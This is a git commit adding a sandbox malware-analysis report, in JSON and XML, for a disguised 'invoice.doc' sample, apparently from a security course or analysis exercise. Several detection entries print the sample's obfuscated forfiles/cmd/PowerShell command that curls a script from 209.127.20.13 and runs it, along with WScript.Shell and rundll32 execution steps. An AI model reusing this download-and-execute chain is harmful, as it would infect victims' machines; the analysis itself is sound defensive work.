first commit

.gitattributes

@@ -0,0 +1,5 @@
+*.pdf filter=lfs diff=lfs merge=lfs -text
+*.png filter=lfs diff=lfs merge=lfs -text
+*.jpg filter=lfs diff=lfs merge=lfs -text
+*.pptx filter=lfs diff=lfs merge=lfs -text
+*.zip filter=lfs diff=lfs merge=lfs -text

Week1/report.json

@@ -0,0 +1,178 @@
+{
+	"Summary":{
+		"Result":"Malicious",
+		"DetectName":"DOC\/DropFileExec.FW.1010",
+		"EngineName":"profrog",
+		"EngineVersion":"1.5.0.305",
+		"Severity":10,
+		"SampleName":"invoice.doc",
+		"SampleExt":"DOC",
+		"TotalElapsedTime":2.817780,
+		"ReachedFileLoopLimit":false,
+		"ReachedUrlLoopLimit":false
+	},
+	"FileTarget":{
+		"invoice.doc_16880":{
+			"TargetID":"invoice.doc_16880",
+			"ParentID":"",
+			"AbsolutePath":"d:\\Sample\\sample_for_QuadMiners\\invoice.doc",
+			"FileName":"invoice.doc",
+			"FileSize":16880,
+			"FileEXT":"DOC",
+			"MD5":"36B85687634E5B6E4E22CA582D0CC99D",
+			"SHA1":"1B51B1206F2C4B1030A7FCA525454FB4D5BC803E",
+			"SHA256":"invoice",
+			"HAS160":"D80336481A8DD017C0B966BC18E74609243A2F05",
+			"FileHeaderDump":"504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000"
+		},
+		"skeml.lnk_258":{
+			"TargetID":"skeml.lnk_258",
+			"ParentID":"invoice.doc_16880",
+			"AbsolutePath":"D:\/GIT\/tripitaka\/Build\/x64Debug\/tripitaka.exe.sandbox\/C\/Users\/Public\/skeml.lnk",
+			"FileName":"skeml.lnk",
+			"FileSize":258,
+			"FileEXT":"LNK",
+			"MD5":"1205E837D76605911605E2FB589CD98D",
+			"SHA1":"FF41313E2F2A860B0573F5EFA77B9962A88B3D82",
+			"SHA256":"A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D",
+			"HAS160":"086F7D4F4022A035D30A5DAFB1422C0C178C76BE",
+			"FileHeaderDump":"EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A"
+		}
+	},
+	"Detection":{
+		"Event":[
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"FakeEXT-DOCX",
+				"AnalysisCode":"",
+				"Severity":3,
+				"Desc":"DOCX file has faked as `DOC` format.",
+				"DescInternational":{
+					"ko-KR":"DOCX 형식의 파일이 `DOC` 형식인 것처럼 위장했습니다."
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"GetObject",
+				"AnalysisCode":"BC",
+				"Severity":1,
+				"Desc":"GetObject(\"NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8\"), RET: WSCRIPT.SHELL",
+				"DescInternational":{
+					"ko-KR":"GetObject(\"NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8\"), RET: WSCRIPT.SHELL"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"CreateShortCut",
+				"AnalysisCode":"BC",
+				"Severity":2,
+				"Desc":"ARF5XJ(WSCRIPT.SHELL).CreateShortCut(\"C:\\Users\\Public\\skeml.lnk\"), RET: SHORTCUT",
+				"DescInternational":{
+					"ko-KR":"ARF5XJ(WSCRIPT.SHELL).CreateShortCut(\"C:\\Users\\Public\\skeml.lnk\"), RET: SHORTCUT"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"Save",
+				"AnalysisCode":"BC",
+				"Severity":1,
+				"Desc":"RECO(SHORTCUT).Save()",
+				"DescInternational":{
+					"ko-KR":"RECO(SHORTCUT).Save()"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"FileCreated",
+				"AnalysisCode":"FW",
+				"Severity":3,
+				"Desc":"New file (C:\\Users\\Public\\skeml.lnk) has been created.\r\n[DEFAULT]\r\nWindowStyle=7\r\nIconLocation=\r\nTargetPath=fOrfiLeS\r\nArguments=\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"\r\nWorkingDirectory=\r\n",
+				"DescInternational":{
+					"ko-KR":"새로운 파일 (C:\\Users\\Public\\skeml.lnk)이 생성되었습니다.\r\n[DEFAULT]\r\nWindowStyle=7\r\nIconLocation=\r\nTargetPath=fOrfiLeS\r\nArguments=\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"\r\nWorkingDirectory=\r\n"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"FileExtracted",
+				"AnalysisCode":"FW",
+				"Severity":3,
+				"Desc":"C:\\Users\\Public\\skeml.lnk",
+				"DescInternational":{
+
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"Exec",
+				"AnalysisCode":"BC",
+				"Severity":3,
+				"Desc":"ARF5XJ(WSCRIPT.SHELL).Exec(\"rundll32 url.dll,OpenURL C:\\Users\\Public\\skeml.lnk\")",
+				"DescInternational":{
+					"ko-KR":"ARF5XJ(WSCRIPT.SHELL).Exec(\"rundll32 url.dll,OpenURL C:\\Users\\Public\\skeml.lnk\")"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"DropFileExec",
+				"AnalysisCode":"FW",
+				"Severity":10,
+				"Desc":"This is an attack that dropped an hidden file and executes.",
+				"DescInternational":{
+					"ko-KR":"감춰둔 파일을 생성해서 실행하는 공격입니다."
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"RunDll32",
+				"AnalysisCode":"FW",
+				"Severity":3,
+				"Desc":"Attempts to execute a OpenURL() of url.dll. It is used when performing malicious actions with a DLL received from an external source.",
+				"DescInternational":{
+					"ko-KR":"url.dll의 OpenURL()를 실행하려고 합니다. 외부에서 받은 DLL로 악성행위를 수행할 때 사용됩니다."
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"skeml.lnk_258",
+				"Name":"ForFiles",
+				"AnalysisCode":"FW",
+				"Severity":3,
+				"Desc":"Attempts to run with forfiles.\r\n\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"",
+				"DescInternational":{
+					"ko-KR":"forfiles로 특정 명령을 실행하려고 합니다.\r\n\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\""
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"skeml.lnk_258",
+				"Name":"PowerShell",
+				"AnalysisCode":"FW",
+				"Severity":8,
+				"Desc":"Attempts to perform malicious commands with PowerShell.\r\ncommand:PowerShell.exe \/W 01 curl http: \/\/209.127.20.13\/woke.js -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js",
+				"DescInternational":{
+					"ko-KR":"PowerShell로 악의적인 명령을 수행하려고 합니다.\r\ncommand:PowerShell.exe \/W 01 curl http: \/\/209.127.20.13\/woke.js -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js"
+				}
+			}
+		]
+	}
+}

Week1/target.xml

@@ -0,0 +1,194 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<root>
+	<Summary>
+		<Result>Malicious</Result>
+		<DetectName>DOC/DropFileExec.FW.1010</DetectName>
+		<EngineName>profrog</EngineName>
+		<EngineVersion>1.5.0.305</EngineVersion>
+		<Severity>10</Severity>
+		<SampleName>invoice.doc</SampleName>
+		<SampleExt>DOC</SampleExt>
+		<TotalElapsedTime>2.817780</TotalElapsedTime>
+		<ReachedFileLoopLimit>false</ReachedFileLoopLimit>
+		<ReachedUrlLoopLimit>false</ReachedUrlLoopLimit>
+	</Summary>
+	<FileTarget>
+		<invoice.doc_16880>
+			<TargetID>invoice.doc_16880</TargetID>
+			<ParentID></ParentID>
+			<AbsolutePath>d:\Sample\sample_for_QuadMiners\invoice.doc</AbsolutePath>
+			<FileName>invoice.doc</FileName>
+			<FileSize>16880</FileSize>
+			<FileEXT>DOC</FileEXT>
+			<MD5>36B85687634E5B6E4E22CA582D0CC99D</MD5>
+			<SHA1>1B51B1206F2C4B1030A7FCA525454FB4D5BC803E</SHA1>
+			<SHA256>invoice</SHA256>
+			<HAS160>D80336481A8DD017C0B966BC18E74609243A2F05</HAS160>
+			<FileHeaderDump>504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000</FileHeaderDump>
+		</invoice.doc_16880>
+		<skeml.lnk_258>
+			<TargetID>skeml.lnk_258</TargetID>
+			<ParentID>invoice.doc_16880</ParentID>
+			<AbsolutePath>D:/GIT/tripitaka/Build/x64Debug/tripitaka.exe.sandbox/C/Users/Public/skeml.lnk</AbsolutePath>
+			<FileName>skeml.lnk</FileName>
+			<FileSize>258</FileSize>
+			<FileEXT>LNK</FileEXT>
+			<MD5>1205E837D76605911605E2FB589CD98D</MD5>
+			<SHA1>FF41313E2F2A860B0573F5EFA77B9962A88B3D82</SHA1>
+			<SHA256>A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D</SHA256>
+			<HAS160>086F7D4F4022A035D30A5DAFB1422C0C178C76BE</HAS160>
+			<FileHeaderDump>EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A</FileHeaderDump>
+		</skeml.lnk_258>
+	</FileTarget>
+	<Detection>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>FakeEXT-DOCX</Name>
+			<AnalysisCode></AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>DOCX file has faked as `DOC` format.</Desc>
+			<DescInternational>
+				<ko-KR>DOCX 형식의 파일이 `DOC` 형식인 것처럼 위장했습니다.</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>GetObject</Name>
+			<AnalysisCode>BC</AnalysisCode>
+			<Severity>1</Severity>
+			<Desc>GetObject(&quot;NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8&quot;), RET: WSCRIPT.SHELL</Desc>
+			<DescInternational>
+				<ko-KR>GetObject(&quot;NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8&quot;), RET: WSCRIPT.SHELL</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>CreateShortCut</Name>
+			<AnalysisCode>BC</AnalysisCode>
+			<Severity>2</Severity>
+			<Desc>ARF5XJ(WSCRIPT.SHELL).CreateShortCut(&quot;C:\Users\Public\skeml.lnk&quot;), RET: SHORTCUT</Desc>
+			<DescInternational>
+				<ko-KR>ARF5XJ(WSCRIPT.SHELL).CreateShortCut(&quot;C:\Users\Public\skeml.lnk&quot;), RET: SHORTCUT</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>Save</Name>
+			<AnalysisCode>BC</AnalysisCode>
+			<Severity>1</Severity>
+			<Desc>RECO(SHORTCUT).Save()</Desc>
+			<DescInternational>
+				<ko-KR>RECO(SHORTCUT).Save()</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>FileCreated</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>New file (C:\Users\Public\skeml.lnk) has been created.
+[DEFAULT]
+WindowStyle=7
+IconLocation=
+TargetPath=fOrfiLeS
+Arguments=/p c:\windows\system32 /m notepad.exe /c &quot;cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js&quot;
+WorkingDirectory=
+</Desc>
+			<DescInternational>
+				<ko-KR>새로운 파일 (C:\Users\Public\skeml.lnk)이 생성되었습니다.
+[DEFAULT]
+WindowStyle=7
+IconLocation=
+TargetPath=fOrfiLeS
+Arguments=/p c:\windows\system32 /m notepad.exe /c &quot;cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js&quot;
+WorkingDirectory=
+</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>FileExtracted</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>C:\Users\Public\skeml.lnk</Desc>
+			<DescInternational>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>Exec</Name>
+			<AnalysisCode>BC</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>ARF5XJ(WSCRIPT.SHELL).Exec(&quot;rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk&quot;)</Desc>
+			<DescInternational>
+				<ko-KR>ARF5XJ(WSCRIPT.SHELL).Exec(&quot;rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk&quot;)</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>DropFileExec</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>10</Severity>
+			<Desc>This is an attack that dropped an hidden file and executes.</Desc>
+			<DescInternational>
+				<ko-KR>감춰둔 파일을 생성해서 실행하는 공격입니다.</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>RunDll32</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>Attempts to execute a OpenURL() of url.dll. It is used when performing malicious actions with a DLL received from an external source.</Desc>
+			<DescInternational>
+				<ko-KR>url.dll의 OpenURL()를 실행하려고 합니다. 외부에서 받은 DLL로 악성행위를 수행할 때 사용됩니다.</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>skeml.lnk_258</TargetID>
+			<Name>ForFiles</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>Attempts to run with forfiles.
+/p c:\windows\system32 /m notepad.exe /c &quot;cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js&quot;</Desc>
+			<DescInternational>
+				<ko-KR>forfiles로 특정 명령을 실행하려고 합니다.
+/p c:\windows\system32 /m notepad.exe /c &quot;cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js&quot;</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>skeml.lnk_258</TargetID>
+			<Name>PowerShell</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>8</Severity>
+			<Desc>Attempts to perform malicious commands with PowerShell.
+command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js</Desc>
+			<DescInternational>
+				<ko-KR>PowerShell로 악의적인 명령을 수행하려고 합니다.
+command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js</ko-KR>
+			</DescInternational>
+		</Event>
+	</Detection>
+</root>